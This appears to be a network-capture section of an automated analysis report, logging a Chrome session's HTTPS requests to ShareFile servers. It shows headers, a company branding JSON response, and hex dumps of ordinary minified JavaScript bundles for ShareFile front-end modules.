                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTGCORS=HfFXdik5qEoeX3RwOj8CnuNZ/ABGidEQ70esUF6tG514qgXqDi6x9vx8rUPsRy8qtq47Iy3x2uo6y1Jh24yZyrwSIXxdyjAHblsTY09e6AUNuaMcpZvU+YUoCcEqzpZ+il5rUhxXGxMFPNPlfEVgflp4fmcAKEz8cRzFXAXsMfxh; AWSALBCORS=HYjHlg5Eqd47PjTAYZug0VZBifgCfwQ6c3evueer19dS6ae7+Q7x1Aigrq/0K/RRTAjiuk1dEgh7fH7QslTWASHADMEKlEp8nTULTaixl5pH5PUdrrZH7w5FbtEu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                Content-Length: 2805
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=NVv2g2uOgR2zh2tNJvuiAiYQP2k3O76OzOQ/tEc3XukrP1CfH0Dh6HLs4Gh3V8hyKLfQPA6kfH86FLcPRd1Xvjpj1xkjXUrs5ObKGb6CTmpn8cbbFSX7gDZcpGtVWuQeLbJdaJD8HsEnqzfH7zj4sh7MBgGrk/KmUo6FfX4qS6kz; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=NVv2g2uOgR2zh2tNJvuiAiYQP2k3O76OzOQ/tEc3XukrP1CfH0Dh6HLs4Gh3V8hyKLfQPA6kfH86FLcPRd1Xvjpj1xkjXUrs5ObKGb6CTmpn8cbbFSX7gDZcpGtVWuQeLbJdaJD8HsEnqzfH7zj4sh7MBgGrk/KmUo6FfX4qS6kz; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=UPFW6SZTf4U4LpUegqAdD0EAa30Vl4pBooaJrj/fZWfBakn7Mf4SEOHmmy2csjWdwIr0YRuLz8h6hAIuo07o+rvc086TGrkNrSxsaXWUdiNT7cx2g0/mM0tLi12t; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=UPFW6SZTf4U4LpUegqAdD0EAa30Vl4pBooaJrj/fZWfBakn7Mf4SEOHmmy2csjWdwIr0YRuLz8h6hAIuo07o+rvc086TGrkNrSxsaXWUdiNT7cx2g0/mM0tLi12t; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                Expires: Tue, 08 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Citrix-TransactionId: 0b4e4ff1-0eb9-4f9e-bb3b-b4c3b811429b
                                                                                                                                                                                                                                                                                CorrelationId: WIKdumCgsEeMfX1xctyzPQ
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                                X-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952
                                                                                                                                                                                                                                                                                X-SFAPI-OAuthClientId:
                                                                                                                                                                                                                                                                                X-SFAPI-AppCode: _None
                                                                                                                                                                                                                                                                                X-SFAPI-RequestID: gju5JbAb4UadeY_RLcR3cQ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC2805INData Raw: 7b 22 43 6f 6d 70 61 6e 79 4e 61 6d 65 22 3a 22 50 72 65 6d 69 65 72 20 42 75 73 69 6e 65 73 73 20 42 72 6f 6b 65 72 22 2c 22 55 73 65 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 22 3a 66 61 6c 73 65 2c 22 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 46 6f 6c 64 65 72 4e 61 6d 65 22 3a 22 22 2c 22 42 72 61 6e 64 69 6e 67 53 74 79 6c 65 73 22 3a 7b 7d 2c 22 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 3a 7b 22 6f 64 61 74 61 2e 74 79 70 65 22 3a 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 7d 2c 22 4c 6f 67 6f 55 52 4c 22 3a 22 22 2c 22 50 72 65 66 65 72 65 6e 63 65 73 22 3a 7b 22 45 6e 61 62 6c 65 43 6c 69 65 6e 74 53 65 6e 64 22 3a 66 61 6c 73 65 2c 22
                                                                                                                                                                                                                                                                                Data Ascii: {"CompanyName":"Premier Business Broker","UseAdvancedCustomBranding":false,"AdvancedCustomBrandingFolderName":"","BrandingStyles":{},"BrandingLinks":{"odata.type":"ShareFile.Api.Models.BrandingLinks"},"LogoURL":"","Preferences":{"EnableClientSend":false,"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                20192.168.2.64974413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC603OUTGET /sharefile-web/sharefiledev-conversations-pilet/1.94.6/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 77283
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 16 Sep 2024 18:27:33 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "c555335753018971124dabd9753f7ab0"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2ec3090d74e200e4acdb2780da3c3c44.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: my0OMdMykGadV84thDWdXcMtrli0lJCL65r9zsZ5vJWkSU-P43IWGg==
                                                                                                                                                                                                                                                                                Age: 37652
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 3b 28 30 2c 69 2e 41 29 28 74 68 69 73 2c 74 29 2c 74 68 69 73 2e 65 6e 74 69 74 79 54 79 70 65 3d 65 2c 74 68 69 73 2e 65 6e 74 69 74 79 49 64 3d 6e 2c 74 68 69 73 2e 70 61 72 65 6e 74 52 65 73 6f 75 72 63 65 49 64 3d 72 7d 72 65 74 75 72 6e 28 30 2c 73 2e 41 29 28 74 2c 5b 7b 6b 65 79 3a 22 74 6f 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 70 61 72 65 6e 74 52 65 73 6f 75 72 63 65 49 64 3d 3d 3d 74 2e 50 72 6f 74 6f 63 6f 6c 3f 22 22 3a 22 2f 22 3b 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 28 22 22 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 61 72 65 6e 74 52 65 73 6f 75 72 63 65 49 64 29 2e 63 6f 6e 63 61 74 28 65 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 65 6e 74 69 74 79 54 79 70 65 2c 22
                                                                                                                                                                                                                                                                                Data Ascii: ;(0,i.A)(this,t),this.entityType=e,this.entityId=n,this.parentResourceId=r}return(0,s.A)(t,[{key:"toString",value:function(){var e=this.parentResourceId===t.Protocol?"":"/";return new URL("".concat(this.parentResourceId).concat(e).concat(this.entityType,"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2b 29 72 5b 6e 5d 3d 74 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 6e 2e 64 28 65 2c 7b 41 3a 28 29 3d 3e 72 7d 29 7d 2c 36 33 36 39 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 74 7d 6e 2e 64 28 65 2c 7b 41 3a 28 29 3d 3e 72 7d 29 7d 2c 33 30 32 39 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 6e 2e 64 28 65
                                                                                                                                                                                                                                                                                Data Ascii: +)r[n]=t[n];return r}n.d(e,{A:()=>r})},6369:(t,e,n)=>{"use strict";function r(t){if(Array.isArray(t))return t}n.d(e,{A:()=>r})},3029:(t,e,n)=>{"use strict";function r(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}n.d(e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC14808INData Raw: 67 6e 61 6c 43 6f 6e 73 75 6d 65 64 3d 21 31 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 71 75 65 72 79 46 6e 28 61 29 29 3a 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 22 4d 69 73 73 69 6e 67 20 71 75 65 72 79 46 6e 20 66 6f 72 20 71 75 65 72 79 4b 65 79 20 27 22 2b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 71 75 65 72 79 48 61 73 68 2b 22 27 22 29 7d 3b 76 61 72 20 64 3b 28 75 28 63 29 2c 6e 75 6c 6c 3d 3d 28 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 65 68 61 76 69 6f 72 29 7c 7c 6e 2e 6f 6e 46 65 74 63 68 28 63 29 2c 74 68 69 73 2e 72 65 76 65 72 74 53 74 61 74 65 3d 74 68 69 73 2e 73 74 61 74 65 2c 22 69 64 6c 65 22 3d 3d 3d 74 68 69 73 2e 73 74 61 74 65 2e 66 65 74 63 68 53 74 61 74 75 73 7c 7c 74 68 69 73 2e 73 74 61 74 65 2e 66 65 74 63 68 4d 65
                                                                                                                                                                                                                                                                                Data Ascii: gnalConsumed=!1,this.options.queryFn(a)):Promise.reject("Missing queryFn for queryKey '"+this.options.queryHash+"'")};var d;(u(c),null==(n=this.options.behavior)||n.onFetch(c),this.revertState=this.state,"idle"===this.state.fetchStatus||this.state.fetchMe
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC420INData Raw: 2c 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 3a 65 7d 29 7d 67 65 74 4d 75 74 61 74 69 6f 6e 44 65 66 61 75 6c 74 73 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 44 65 66 61 75 6c 74 73 2e 66 69 6e 64 28 28 65 3d 3e 28 30 2c 6f 2e 43 70 29 28 74 2c 65 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 29 29 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 7d 64 65 66 61 75 6c 74 51 75 65 72 79 4f 70 74 69 6f 6e 73 28 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 74 26 26 74 2e 5f 64 65 66 61 75 6c 74 65 64 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 65 3d 7b 2e 2e 2e 74 68 69 73 2e 64 65 66 61 75 6c 74 4f 70
                                                                                                                                                                                                                                                                                Data Ascii: ,defaultOptions:e})}getMutationDefaults(t){if(!t)return undefined;const e=this.mutationDefaults.find((e=>(0,o.Cp)(t,e.mutationKey)));return null==e?void 0:e.defaultOptions}defaultQueryOptions(t){if(null!=t&&t._defaulted)return t;const e={...this.defaultOp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 2e 72 65 66 65 74 63 68 4f 6e 52 65 63 6f 6e 6e 65 63 74 26 26 28 65 2e 72 65 66 65 74 63 68 4f 6e 52 65 63 6f 6e 6e 65 63 74 3d 22 61 6c 77 61 79 73 22 21 3d 3d 65 2e 6e 65 74 77 6f 72 6b 4d 6f 64 65 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 26 26 28 65 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3d 21 21 65 2e 73 75 73 70 65 6e 73 65 29 2c 65 7d 64 65 66 61 75 6c 74 4d 75 74 61 74 69 6f 6e 4f 70 74 69 6f 6e 73 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 2e 5f 64 65 66 61 75 6c 74 65 64 3f 74 3a 7b 2e 2e 2e 74 68 69 73 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 2e 6d 75 74 61 74 69 6f 6e 73 2c 2e 2e 2e 74 68 69 73 2e
                                                                                                                                                                                                                                                                                Data Ascii: "==typeof e.refetchOnReconnect&&(e.refetchOnReconnect="always"!==e.networkMode),"undefined"==typeof e.useErrorBoundary&&(e.useErrorBoundary=!!e.suspense),e}defaultMutationOptions(t){return null!=t&&t._defaulted?t:{...this.defaultOptions.mutations,...this.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC111INData Raw: 3a 74 2c 72 65 73 6f 75 72 63 65 50 61 74 68 3a 72 2e 64 65 66 61 75 6c 74 50 61 74 68 7d 2c 72 2e 64 61 74 61 43 6f 6e 74 72 61 63 74 29 29 3b 63 61 73 65 20 35 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 69 2e 73 74 6f 70 28 29 7d 7d 29 2c 69 29 7d 29 29 29 7d 7d 29 7d 7d 29 28 29 2c 76 7d 29 28 29 29 7d 7d 7d 29 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: :t,resourcePath:r.defaultPath},r.dataContract));case 5:case"end":return i.stop()}}),i)})))}})}})(),v})())}}}));


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                21192.168.2.64974613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC605OUTGET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 113304
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 07 Aug 2024 19:21:56 GMT
                                                                                                                                                                                                                                                                                ETag: "530a7b55c7f2519e38f8b06fe7b2ab6d"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 d8eef512ab23f23f549b4cd25ac5328c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: UgZZ864js3ceiSMvvLZmmjb_dLlWITWhciiWpERajJ83YIM4Obn3Xw==
                                                                                                                                                                                                                                                                                Age: 45971
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 61 75 64 69 74 63 6f 6c 6c 65 63 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 42 75 74 74 6f 6e 3d 65 2e 42 75 74 74 6f 6e 2c 72 2e 44 61 74 65 50 69 63 6b 65 72 3d 65 2e 44 61 74 65 50
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{})System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Button=e.Button,r.DatePicker=e.DateP
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 75 6d 65 6e 74 73 5b 31 5d 3a 7b 6e 73 3a 5b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 5d 2c 64 65 66 61 75 6c 74 4e 53 3a 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 7d 3b 72 65 74 75 72 6e 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 72 29 2c 6e 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 2c 43 26 26 78 2e 63 61 6c 6c 28 28 30 2c 63 2e 41 29 28 6e 29 29 2c 6e 2e 64 61 74 61 3d 65 7c 7c 7b 7d 2c 6e 2e 6f 70 74 69 6f 6e 73 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 22 2e 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e
                                                                                                                                                                                                                                                                                Data Ascii: uments[1]:{ns:["translation"],defaultNS:"translation"};return(0,a.A)(this,r),n=t.call(this),C&&x.call((0,c.A)(n)),n.data=e||{},n.options=o,void 0===n.options.keySeparator&&(n.options.keySeparator="."),void 0===n.options.ignoreJSONStructure&&(n.options.ign
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2c 22 6b 75 22 2c 22 6c 62 22 2c 22 6d 61 69 22 2c 22 6d 6c 22 2c 22 6d 6e 22 2c 22 6d 72 22 2c 22 6e 61 68 22 2c 22 6e 61 70 22 2c 22 6e 62 22 2c 22 6e 65 22 2c 22 6e 6c 22 2c 22 6e 6e 22 2c 22 6e 6f 22 2c 22 6e 73 6f 22 2c 22 70 61 22 2c 22 70 61 70 22 2c 22 70 6d 73 22 2c 22 70 73 22 2c 22 70 74 2d 50 54 22 2c 22 72 6d 22 2c 22 73 63 6f 22 2c 22 73 65 22 2c 22 73 69 22 2c 22 73 6f 22 2c 22 73 6f 6e 22 2c 22 73 71 22 2c 22 73 76 22 2c 22 73 77 22 2c 22 74 61 22 2c 22 74 65 22 2c 22 74 6b 22 2c 22 75 72 22 2c 22 79 6f 22 5d 2c 6e 72 3a 5b 31 2c 32 5d 2c 66 63 3a 32 7d 2c 7b 6c 6e 67 73 3a 5b 22 61 79 22 2c 22 62 6f 22 2c 22 63 67 67 22 2c 22 66 61 22 2c 22 68 74 22 2c 22 69 64 22 2c 22 6a 61 22 2c 22 6a 62 6f 22 2c 22 6b 61 22 2c 22 6b 6d 22 2c 22 6b 6f
                                                                                                                                                                                                                                                                                Data Ascii: ,"ku","lb","mai","ml","mn","mr","nah","nap","nb","ne","nl","nn","no","nso","pa","pap","pms","ps","pt-PT","rm","sco","se","si","so","son","sq","sv","sw","ta","te","tk","ur","yo"],nr:[1,2],fc:2},{lngs:["ay","bo","cgg","fa","ht","id","ja","jbo","ka","km","ko
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC14808INData Raw: 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 35 3f 61 72 67 75 6d 65 6e 74 73 5b 35 5d 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 3e 3d 74 68 69 73 2e 6d 61 78 50 61 72 61 6c 6c 65 6c 52 65 61 64 73 3f 76 6f 69 64 20 74 68 69 73 2e 77 61 69 74 69 6e 67 52 65 61 64 73 2e 70 75 73 68 28 7b 6c 6e 67 3a 65 2c 6e 73 3a 74 2c 66 63 4e 61 6d 65 3a 72 2c 74 72 69 65 64 3a 6f 2c 77 61 69 74 3a 69 2c 63 61 6c 6c 62 61 63 6b 3a 61 7d 29 3a 28 74 68 69 73 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 2b 2b 2c 74 68 69 73 2e 62 61 63 6b 65 6e 64 5b 72 5d 28 65 2c 74 2c 28 66 75 6e 63 74 69 6f 6e 28 73 2c 63 29 7b 69 66 28 6e 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 2d 2d 2c 6e 2e 77 61
                                                                                                                                                                                                                                                                                Data Ascii: a=arguments.length>5?arguments[5]:void 0;return e.length?this.readingCalls>=this.maxParallelReads?void this.waitingReads.push({lng:e,ns:t,fcName:r,tried:o,wait:i,callback:a}):(this.readingCalls++,this.backend[r](e,t,(function(s,c){if(n.readingCalls--,n.wa
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC419INData Raw: 6e 73 74 61 6e 63 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 64 65 2c 6f 3d 70 65 28 70 65 28 70 65 28 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 29 2c 7b 69 73 43 6c 6f 6e 65 3a 21 30 7d 29 2c 69 3d 6e 65 77 20 72 28 6f 29 3b 76 6f 69 64 20 30 3d 3d 3d 74 2e 64 65 62 75 67 26 26 76 6f 69 64 20 30 3d 3d 3d 74 2e 70 72 65 66 69 78 7c 7c 28 69 2e 6c 6f
                                                                                                                                                                                                                                                                                Data Ascii: nstance",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:de,o=pe(pe(pe({},this.options),t),{isClone:!0}),i=new r(o);void 0===t.debug&&void 0===t.prefix||(i.lo
